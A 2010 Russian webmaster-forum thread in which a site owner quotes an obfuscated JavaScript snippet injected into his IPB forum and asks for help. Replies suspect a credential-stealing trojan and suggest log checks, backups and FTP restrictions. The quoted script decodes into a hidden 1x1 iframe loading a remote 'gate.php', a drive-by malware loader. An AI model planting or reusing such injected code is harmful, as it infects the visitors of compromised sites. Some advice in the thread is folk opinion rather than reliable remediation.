Вернуться   Форум SAPE.RU > Другое > Курилка

-->
Ответ
 
Опции темы
Старый 08.03.2010, 19:04   #1
Новичок
 
Аватар для Zybenkov
 
Регистрация: 04.03.2009
Сообщений: 56
Вес репутации: 186
Zybenkov скоро станет известен
По умолчанию Внедрили скрипт в ipb. помогите разобраться.

Сейчас обнаружил в на форуме это :

Цитата:
<script language="JavaScript">function crypo(){var temp="",i,c=0,out="";var str="13&10&60&105&102&114&97&109&101&32&115&114&99 &61&34&104&116&116&112&58&47&47&104&116&99&115&46& 97&120&51&46&110&101&116&47&100&120&116&100&115&47 &103&97&116&101&46&112&104&112&34&32&119&105&100&1 16&104&61&34&49&34&32&104&101&105&103&104&116&61&3 4&49&34&32&102&114&97&109&101&98&111&114&100&101&1 14&61&34&48&34&62&60&47&105&102&114&97&109&101&62& ";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='&')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp=""; }document.write(out);}</script>
<script language="JavaScript">crypo();</script>
В админка показала, что внедрили буквально минут 15 назад, я все прибрал, что нашел. Но что это?: пока меняю пароли.
Zybenkov вне форума   Ответить с цитированием
Старый 08.03.2010, 19:09   #2
Мастер
 
Аватар для gid
 
Регистрация: 11.03.2007
Сообщений: 607
Вес репутации: 233
gid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордитсяgid - за этого человека можно гордится
По умолчанию

это скорее всего код для загрузки вируса всем вашим "незащищенным" посетителям, чистите систему или ищите "шпионов" среди друзей/знакомых, а уж затем меняйте пароли.

ps
советую перейти на ubuntu 9.10, и в большинстве случаев, подобные проблемы Вас не побеспокоят.
__________________
Большой хостинг для Больших СДЛ
∙ В своей работе я использую: Sape и SEO Budget
∙ продвижение - от 15 000 руб. | контакты - ЛС
gid вне форума   Ответить с цитированием
Старый 08.03.2010, 19:10   #3
Эксперт
 
Аватар для Anadonam
 
Регистрация: 29.10.2009
Адрес: Вологда and SSHA
Сообщений: 3,897
Вес репутации: 353
Anadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущее
Отправить сообщение для Anadonam с помощью ICQ
По умолчанию

Zybenkov, браузер ИЕ ?) просто интересно !..)
Anadonam вне форума   Ответить с цитированием
Старый 08.03.2010, 19:12   #4
Новичок
 
Аватар для Zybenkov
 
Регистрация: 04.03.2009
Сообщений: 56
Вес репутации: 186
Zybenkov скоро станет известен
По умолчанию

omg, все сайты на хостинге покоцало, айм фейл

Добавлено через 48 секунд
opera и firefox, иногда осла открывал редко.

Последний раз редактировалось Zybenkov; 08.03.2010 в 19:12. Причина: Добавлено сообщение
Zybenkov вне форума   Ответить с цитированием
Старый 08.03.2010, 19:16   #5
Эксперт
 
Аватар для Anadonam
 
Регистрация: 29.10.2009
Адрес: Вологда and SSHA
Сообщений: 3,897
Вес репутации: 353
Anadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущееAnadonam - прекрасное будущее
Отправить сообщение для Anadonam с помощью ICQ
По умолчанию

Zybenkov, да просто смена паролей как таковое не поможет если у тебя троян сидит - а он скорее всего сидит - у меня была такая беда - но моей бедой был ИЕ - пересьтал им пользоваться и всё прошло.. тут хз

то что все сайлы ломанули эт нормально - на твоем компе веть были прописаны все доступы и пароли к ним - вот их и дернули - но это делает не чел руками это прога - троян

на время лечения делай чистые бекапы сайтов - могут сильно пригодиться- шоб не чистить по 100 раз руками всё - пока не надёш дыру !

Последний раз редактировалось Anadonam; 08.03.2010 в 19:21.
Anadonam вне форума   Ответить с цитированием
Старый 08.03.2010, 20:42   #6
Новичок
 
Аватар для Zybenkov
 
Регистрация: 04.03.2009
Сообщений: 56
Вес репутации: 186
Zybenkov скоро станет известен
По умолчанию

бекапы есть, сейчас этим занимаюсь. не разу не востанавливал.

Добавлено через 1 час 20 минут
проблема решена с сайтами, но как искать трояна:? dr/wed ничего не видит, сейчас поставил аутпост, в сеть никто не лезет.

Последний раз редактировалось Zybenkov; 08.03.2010 в 20:42. Причина: Добавлено сообщение
Zybenkov вне форума   Ответить с цитированием
Старый 08.03.2010, 22:16   #7
Специалист
 
Аватар для Avom
 
Регистрация: 26.04.2008
Адрес: Cerro de Montevideo
Сообщений: 144
Вес репутации: 199
Avom - как роза среди колючекAvom - как роза среди колючекAvom - как роза среди колючек
По умолчанию

да это скорее всего через вашего хостера сделали,если не он сам)
Avom вне форума   Ответить с цитированием
Старый 08.03.2010, 22:22   #8
Специалист
 
Регистрация: 19.03.2009
Сообщений: 147
Вес репутации: 187
sitestyler - весьма и весьма положительная личностьsitestyler - весьма и весьма положительная личность
Отправить сообщение для sitestyler с помощью ICQ
По умолчанию

Цитата:
Сообщение от gid Посмотреть сообщение
советую перейти на ubuntu 9.10, и в большинстве случаев, подобные проблемы Вас не побеспокоят.
Плюс стопицот. Более двух лет стоит убунта и отлично работает. А винда чисто ради опытов на VirtualBox есть.
sitestyler вне форума   Ответить с цитированием
Старый 09.03.2010, 00:41   #9
не эксперт
 
Регистрация: 14.06.2008
Адрес: msk
Сообщений: 2,180
Вес репутации: 294
zeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Zybenkov Посмотреть сообщение
внедрили буквально минут 15 назад
- посмотрите по логам с каких ip
- загрузите .ftpaccess в корень, пока не найдете откуда
zeta вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите разобраться!!! aleksand Вопросы от новичков 31 12.12.2009 20:45
HELP ! Помогите разобраться! dyni Вопросы по работе системы 12 10.12.2009 04:26
Помогите разобраться!!! infocean Вопросы от новичков 3 29.04.2008 21:45
Помогите разобраться underground Яндекс 4 15.12.2007 10:39
Помогите разобраться... gmama Яндекс 18 10.08.2007 23:19


Часовой пояс GMT +3, время: 02:39.